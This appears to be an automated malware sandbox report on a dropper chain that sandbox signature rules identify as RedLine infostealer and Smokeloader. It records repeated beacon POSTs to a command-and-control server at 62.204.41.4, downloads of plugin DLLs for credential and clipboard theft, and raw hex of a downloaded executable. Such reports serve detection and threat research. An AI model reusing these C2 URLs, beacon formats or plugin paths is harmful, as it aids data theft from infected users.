                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 06 Feb 2023 17:35:56 GMTContent-Type: application/octet-streamContent-Length: 91136Last-Modified: Fri, 03 Feb 2023 17:19:21 GMTConnection: keep-aliveETag: "63dd4219-16400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 38 dd 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                              Source: Joe Sandbox ViewIP Address: 62.204.41.4 62.204.41.4
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll6
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dll
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dllA
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 0000000F.00000002.775467476.0000000001182000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php$
                              Source: mnolyk.exe, 0000000F.00000002.775467476.00000000010FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php/
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php79e5342a2
                              Source: mnolyk.exe, 0000000F.00000002.775467476.00000000010FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpK
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpL
                              Source: mnolyk.exe, 0000000F.00000002.775467476.00000000010FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpQ
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpT
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpi
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpn
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpp
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprosoft
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpz
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001182000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Golol478Ns/index.php
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010A7F00 CreateMutexW,GetLastError,SetCurrentDirectoryA,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,14_2_010A7F00
                              Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                              Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 06 Feb 2023 17:35:56 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: mnolyk.exe, 0000000F.00000002.775467476.00000000010FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                              System Summary

                              barindex
                              Source: 2.2.arJf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 2.2.arJf.exe.580e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 2.3.arJf.exe.5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 2.2.arJf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 00000002.00000002.363155584.0000000000667000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                              Source: 00000002.00000002.362707528.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                              Source: 00000002.00000003.336400821.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A33BA20_2_00A33BA2
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A35C9E0_2_00A35C9E
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCode function: 1_2_00F83BA21_2_00F83BA2
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCode function: 1_2_00F85C9E1_2_00F85C9E
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_00408C602_2_00408C60
